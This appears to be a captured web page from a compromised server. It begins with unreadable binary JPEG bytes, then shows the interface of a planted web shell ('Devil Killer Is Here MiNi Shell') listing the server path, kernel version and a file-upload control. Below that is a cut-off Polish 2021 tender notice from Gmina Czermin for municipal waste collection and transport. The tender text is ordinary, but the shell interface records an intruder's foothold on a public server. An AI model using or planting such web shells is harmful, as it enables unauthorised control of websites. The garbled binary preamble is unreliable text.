JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20211018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20211018/0023557801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór i transport odpadów komunalnych zmieszanych i selektywnie zbieranych z nieruchomości zamieszkałych i niezamieszkałych na terenie gminy Czermin”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CZERMIN</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Referat Rolnictwa, Budownictwa i Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854903</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czermin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-304</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">627416031</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">627417324</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">os@czermin.wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://czermin.wlkp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór i transport odpadów komunalnych zmieszanych i selektywnie zbieranych z nieruchomości zamieszkałych i niezamieszkałych na terenie gminy Czermin”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8629f5cd-3001-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00235578</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8629f5cd-3001-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu i Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wymagania informacyjne zostały szczegółowo określone w załączniku do Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wymagania informacyjne zostały szczegółowo określone w załączniku do Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RB.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest:<br/>Odbiór i transport odpadów komunalnych zmieszanych i selektywnie zbieranych z nieruchomości zamieszkałych i niezamieszkałych na terenie gminy Czermin.<br/>Zakres zamówienia obejmuje w szczególności:<br/>a) Odbiór zmieszanych odpadów komunalnych od wszystkich właścicieli nieruchomości zamieszkałych i<br/>niezamieszkałych, na których powstają odpady komunalne z terenu gminy Czermin.<br/>b) Odbiór selektywnie zbieranych odpadów komunalnych (tworzywa sztuczne i drobne metale, szkło białe,<br/>szkło kolorowe, papier i tektura, odpady biodegradowalne, baterie, leki popiół) od wszystkich<br/>właścicieli nieruchomości zamieszkałych i niezamieszkałych, na których powstają odpady komunalne z<br/>terenu gminy Czermin oraz odpadów znajdujących się na terenach użyteczności publicznej.<br/>c) Odbiór i transport odpadów przyjmowanych w Punkcie Selektywnej Zbiórki Odpadów, po jego<br/>uruchomieniu będzie do odbioru w kontenerach KP10, KP14 odpady selektywnie zbierane.<br/>Przewidywana ilość odebranych kontenerów od dnia uruchomienia PSZOK-u do końca roku wynosi:<br/>ok. 120 kontenerów. PSZOK, zlokalizowany będzie pod adresem: Czermin 1B, 63-304 Czermin.<br/>d) Wykonawca zobowiązany jest do transportu wszystkich odebranych zmieszanych odpadów<br/>komunalnych i selektywnie zbieranych do Instalacji Przetwarzania Odpadów Komunalnych w<br/>Jarocinie zlokalizowanej w Witaszyczkach ul. Mariusza Małynicza 1 63-200 Jarocin.<br/>e) Wykonywanie innych obowiązków wynikających z przepisów prawa w szczególności<br/>przepisów: ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z<br/>2021r. poz. 888 ze zm. ), ustawy z dnia 14 grudnia 2012r. o odpadach (t.j. Dz. U. z 2021 r. poz. 779),<br/>ustawy z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (t.j. Dz. U. z 2020r., poz. 1219 z zm.),<br/>Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w<br/>zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r. poz. 122),<br/>Uchwała Nr XX/99/20 Rady Gminy Czermin z dnia 28 maja 2020 w sprawie Regulaminu utrzymania<br/>czystości i porządku na terenie gminy Czermin oraz Uchwała Nr XXIII/109/20 Rady Gminy Czermin z<br/>dnia 13 lipca 2020r zmieniająca datę wejścia w życie Regulaminu, Uchwała Nr XXXV/17/21 z 27<br/>września 2021 r. w sprawie zmiany uchwały o uchwaleniu Regulaminu utrzymania czystości i porządku<br/>na terenie Gminy Czermin.<br/>f) Wykonywanie zamówienia w sposób, który uniemożliwi mieszanie selektywnie zebranych odpadów<br/>komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości.<br/>g) Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 7 do SWZ.<br/>Przez nieruchomość niezamieszkałą należy rozumieć – nieruchomość, na której nie zamieszkują<br/>mieszkańcy a powstają odpady komunalne np. zakłady pracy, działalność gospodarcza prowadzona na<br/>posesji, obiekty handlowe i usługowe, domki letniskowe, ogrody działkowe, szkoły, urzędy, obiekty<br/>użyteczności publicznej, cmentarze, ulice, place zabaw, tereny zieleni i parki.<br/>3.1.1. Przewidywalna liczba nieruchomości zamieszkałych, od których będzie trzeba odebrać odpady na<br/>podstawie złożonych deklaracji na terenie gminy Czermin to ok. 1.179 (stan na dzień 14.10.2021 r.-<br/>dane z systemu GOK). Zamawiający nie dysponuje odrębnym wykazem z liczbą osób faktycznie<br/>zamieszkujących. Przewidywalna liczba nieruchomości niezamieszkałych, od których będzie trzeba<br/>odebrać odpady na podstawie złożonych deklaracji na terenie gminy Czermin to ok. 90 (stan na dzień<br/>14.10.2021 r.- dane z systemu GOK). Zamawiający nie dysponuje odrębnym wykazem z liczbą osób<br/>faktycznie zamieszkujących.(załącznik nr 10 i 11)<br/>3.1.2. Przewidywalna ilość wytworzonych odpadów komunalnych zmieszanych z terenu gminy Czermin, którą<br/>trzeba będzie odebrać od właścicieli nieruchomości zamieszkałych i niezamieszkałych wynosi 460,00<br/>Mg/12 m-cy<br/>3.1.3. Przewidywalna ilość wytworzonego popiołu z terenu gminy Czermin, którą trzeba będzie odebrać od<br/>właścicieli nieruchomości zamieszkałych i niezamieszkałych wynosi 320,00 Mg/12 m-cy<br/>3.1.4. Przewidywalna ilość wytworzonych odpadów komunalnych zbieranych selektywnie (opakowania z<br/>papieru i tektury, tworzywa sztuczne i drobne metale, szkło białe, szkło kolorowe, odpady ulegające<br/>biodegradacji, leki, popiół) z terenu gminy Czermin, którą trzeba będzie odebrać od właścicieli<br/>nieruchomości zamieszkałych i niezamieszkałych wynosi 293,230 Mg /12 m-cy.<br/>3.1.5. Ustalone ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego<br/>uwzględniając ilość odpadów wytworzonych przez właścicieli nieruchomości. Podane ilości należy<br/>traktować jako orientacyjne.<br/>3.1.6. Powierzchnia gminy Czermin wynosi: 97,8 ha.<br/>3.1.7. Zamawiający nie wymaga, aby Wykonawcy dokonali wizji lokalnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Końcowa wartość (cena netto), wartość podatku VAT oraz ostateczna cena oferty (cena brutto), winny być liczone do dwóch miejsc po przecinku.<br/>2. Wartości składowe ceny powinny zawierać w sobie ewentualne upusty oferowane przez Wykonawcę. Wprowadzenie przez Wykonawcę jakichkolwiek zmian w Formularzu ofertowym spowoduje odrzucenie oferty (z zastrzeżeniem zapisów art. 223 ust. 2 pkt 3 ustawy). Wszystkie podane ceny winny być zaokrąglone do dwóch miejsc po przecinku.<br/>3. Podane przez Wykonawcę ceny jednostkowe będą stanowiły podstawę miesięcznych rozliczeń za faktycznie wykonane usługi.<br/>4. Zakres usług do obliczenia ceny oferty określony jest w pkt. 3 SWZ.<br/>5. Wszystkie ceny jednostkowe określone przez Wykonawcę zostaną ustalone na okres ważności umowy i nie będą podlegały zmianom.<br/>6. Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.<br/>7. Rozliczenie między Zamawiającym a Wykonawcą będzie prowadzone w PLN (polskich złotych).<br/>W przypadku Wykonawcy spoza terytorium Rzeczypospolitej Polskiej, który na podstawie odrębnych przepisów nie jest zobowiązany do uiszczania VAT na terytorium Rzeczypospolitej Polskiej i który w Ofercie poda cenę z zerową stawką VAT, Zamawiający na etapie oceny i porównania ofert doliczy do ceny ofertowej podatek od towarów i usług w wysokości określonej aktualnie obowiązującymi przepisami, zgodnie z art. 2 ust. 1 ustawy mówiącym o cenie w rozumieniu art. 3 ust. 1 Ustawy o cenach z dnia 5 lipca 2001 r., powyższe wynika z konieczności ustalenia kwoty, która będzie realnie obciążała budżet Zamawiającego z tytułu realizacji zamówienia.<br/>Oferty odrzucone nie będą brały udziału w postępowaniu o udzielenie zamówienia publicznego. Pozostałe oferty oceniane będą punktowo. Maksymalna ilość punktów jaką może otrzymać oferta wynosi 100 pkt.<br/>2. Kryteria wraz z wagami<br/>Kryterium CENA waga 60 %<br/>Cmin<br/>C = ----------------- x 60<br/>Cx<br/>C - ilość punktów przyznanych danej ofercie za cenę, koszt brutto.<br/>Cmin - minimalna cena, koszt brutto zaoferowana w postępowaniu.<br/>Cx – cena, koszt brutto rozpatrywanej oferty.<br/>Maksymalna ilość punktów jaką może otrzymać oferta w kryterium cena wynosi 60 pkt.<br/>Kryterium TERMIN płatności faktury waga 40 %<br/>Termin płatności 7 dni – 0 pkt;<br/>Termin płatności 14 dni – 20 pkt<br/>Termin płatności 21 dni – 30 pkt<br/>Termin płatności 30 dni – 40 pkt.<br/>Maksymalna ilość punktów jaką może otrzymać oferta w kryterium termin płatności faktury wynosi 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury VAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu<br/>2) spełniają warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>- w postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Czermin, zgodnie z art. 9b i 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach oraz art. 43 ustawy z dnia 6 marca 2018r. Prawo przedsiębiorców w zakresie kodów odpadów komunalnych objętych przedmiotem zamówienia.<br/>- w postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają wpis do prowadzonego przez Marszałka Województwa Wielkopolskiego rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII), o którym mowa w art. 49 i następne ustawy z dnia 14 grudnia 2012 r. o odpadach i który to rejestr stanowi element Bazy Danych o produktach i opakowaniach oraz o gospodarce odpadami.<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>4) zdolności technicznej lub zawodowej - w postępowaniu mogą wziąć udział Wykonawcy, którzy:<br/>- dysponują bazą transportowo–magazynową spełniającą wymagania rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, usytuowaną w Gminie Czermin lub w odległości nie większej niż 60 km od granicy tej gminy oraz posiada tytuł prawny do terenu na którym jest ona zlokalizowana.<br/>- dysponują jednym pojazdem, przystosowanym do odbierania niesegregowanych (zmieszanych) odpadów komunalnych, spełniającymi wymagania rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>- dysponują jednym pojazdem, przystosowanym do odbierania selektywnie zebranych odpadów komunalnych,<br/>spełniającymi wymagania rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>- dysponują jednym pojazdem, przystosowanym do odbierania odpadów bez funkcji kompaktującej, spełniającym wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>- dysponują jednym pojazdem, przystosowanym do odbierania odpadów, spełniającym wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z możliwością wjazdu na drogi o szerokości do 3,0 m, z dopuszczalną masą całkowitą do 12 ton, szerokością zabudowy pojazdu nieprzekraczającą 2,5 m.<br/>- dysponują jednym pojazdem typu: hakowiec/bramowiec, przystosowany do odbierania kontenerów, KP 10, KP14 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia wykonawca złoży wymagane przez zamawiającego oświadczenia oraz dokumenty.<br/>2. Wykonawca zobowiązany jest dołączyć do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego oraz oświadczenie o przynależności lub braku przynależności do grupy kapitałowej.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)	Na podstawie i w granicach art. 455 ustawy dnia 11 września 2019 r. Prawo zamówień publicznych, Zamawiający dopuszcza możliwość zmiany zawartej umowy o zamówienie w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. <br/>2)	Zmiana postanowień niniejszej umowy może nastąpić w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem wskazanych warunków ich wprowadzenia: <br/>a)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku, gdy ulegną zmianie powszechnie obowiązujące przepisy w zakresie wysokości stawki podatku VAT na przedmiot usługi;<br/>b)	dopuszczalna jest zmiana umowy polegająca na zmianie ilości odbieranych odpadów i wysokości wynagrodzenia za przedmiot zamówienia w przypadku wystąpienia powodów niezależnych od Zamawiającego (np. w przypadku błędnego oszacowania 